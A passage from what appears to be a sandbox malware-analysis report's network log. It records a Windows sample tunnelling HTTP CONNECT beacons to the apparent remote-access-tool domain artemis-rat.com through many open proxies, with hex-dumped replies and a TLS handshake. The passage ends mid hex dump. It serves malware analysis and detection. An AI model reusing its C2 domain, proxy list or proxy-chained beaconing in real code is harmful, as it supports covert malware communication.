                                              1695192.168.2.454522125.141.139.11255667284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.187803030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:54.216974974 CET755INHTTP/1.0 501 Tor is not an HTTP Proxy
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 6f 72 20 69 73 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 6f 72 20 69 73 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 54 6f 72 20 61 73 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 6f 72 20 69 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 21 2d 2d 20 50 6c 75 73 20 74 68 69 73 20 63 6f 6d 6d 65 6e 74 2c 20 74 6f 20 6d 61 6b 65 20 74 68 65 20 62 6f 64 79 20 72 65 73 70 6f 6e 73 65 20 6d 6f 72 65 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 73 6f 20 20 20 20 20 20 49 45 20 77 69 6c 6c 20 62 65 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 70 6c 61 79 20 69 74 2e 20 43 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 20 20 20 20 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 2e 2d 2d 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                              Data Ascii: <html><head><title>Tor is not an HTTP Proxy</title></head><body><h1>Tor is not an HTTP Proxy</h1><p>It appears you have configured your web browser to use Tor as an HTTP proxy.This is not correct: Tor is a SOCKS proxy, not an HTTP proxy.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.... Plus this comment, to make the body response more than 512 bytes, so IE will be willing to display it. Comment comment comment comment comment comment comment comment comment comment comment comment.--></p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1696192.168.2.45456437.187.77.5831397284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.238959074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.069530010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1697192.168.2.45066391.134.140.160496877284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.253745079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.757258892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.257368088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.266748905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1698192.168.2.45521238.54.101.25431287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.254168034 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:25.757199049 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:26.366486073 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:27.569726944 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:29.663582087 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:31.757260084 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:33.866408110 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:38.054143906 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:46.366272926 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1699192.168.2.454689115.96.208.12480807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.256187916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.719091892 CET72INHTTP/1.1 200 Connection Established
                                              Proxy-Agent: Fortinet-Proxy/1.0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1700192.168.2.454833194.4.50.62123347284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.293173075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1701192.168.2.45068151.161.131.84199877284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.294094086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1702192.168.2.45520418.135.133.116807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.295146942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.585777998 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:25 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0
                                              Mar 11, 2024 08:37:25.640069008 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ee b4 b4 2f f7 a8 c8 35 23 3d ad f6 81 a7 bd 8e 66 92 32 70 3e 1d c5 13 20 b7 a2 28 8d c7 2f 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                              Data Ascii: e/5#=f2p> (/*,+0/$#('=<5/Uartemis-rat.com#
                                              Mar 11, 2024 08:37:25.930793047 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 bf c4 82 b6 75 35 ea 20 8e 46 da 2b 5b 6a ce 0d 5f 0c ba d7 3e 6f 5f 31 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                              Data Ascii: =9u5 F+[j_>o_1DOWNGRD0000*H010Uartemis-rat.com0240311072552Z260311072552Z010Uartemis-rat.com0"0*H0>ff&'.
                                              Mar 11, 2024 08:37:25.936934948 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 18 fd 44 12 3e aa f7 cd 97 51 d4 48 0c 51 7d a2 b2 b3 dd fc 0f 2b 52 7a 31 a4 9f 47 c4 88 31 79 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 07 6c 0f 70 19 7a 3b bb a3 f5 d5 a5 a7 e3 a0 c4 05 2b 38 e0 fa
                                              Data Ascii: %! D>QHQ}+Rz1G1y(lpz;+8=f
                                              Mar 11, 2024 08:37:26.227449894 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 c7 0a 46 18 9e 47 24 98 2f d0 90 0c ac a5 cd f1 e7 5f af 9d 07 13 a4 9f ad ba ac 2b 0b b0 ed f1 b1 f9 81 bc 1b a3 1c 6e
                                              Data Ascii: (FG$/_+n


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1703192.168.2.455201196.20.125.14580837284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.296998024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1704192.168.2.455211184.170.249.6541457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.298620939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1705192.168.2.454603165.0.136.3080807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.308856010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.760030985 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1706192.168.2.45059927.147.139.15480907284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.376781940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.793520927 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1707192.168.2.45520979.110.202.13180817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.384150982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1708192.168.2.455216104.200.135.4641457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.385829926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1709192.168.2.454790183.91.80.19480897284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.418623924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.765280962 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1710192.168.2.45486772.167.222.113395747284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.425015926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.553926945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.663465977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1711192.168.2.45522066.45.246.19488887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.459512949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1712192.168.2.455215211.222.252.18781937284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.477116108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1713192.168.2.45487651.222.241.157300117284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.482546091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.554136992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.663465977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:37.866846085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1714192.168.2.453071217.60.194.19831287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.488132954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1715192.168.2.4547975.202.104.2231287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.499775887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1716192.168.2.455208111.206.0.9981817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.509726048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.491803885 CET162INHTTP/1.1 200 Connection Established
                                              Accept-Ranges: bytes
                                              Content-Length: 0
                                              Date: Mon, 11 Mar 2024 07:37:25 GMT
                                              Server: eJet/1.4.2
                                              X-Nat-IP: 154.16.105.38


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1717192.168.2.455218138.36.199.1441537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.513394117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1718192.168.2.455213185.101.16.52807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.513641119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1719192.168.2.45521958.58.68.218108007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.518471003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1720192.168.2.455214114.55.84.12300017284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.530870914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.890207052 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 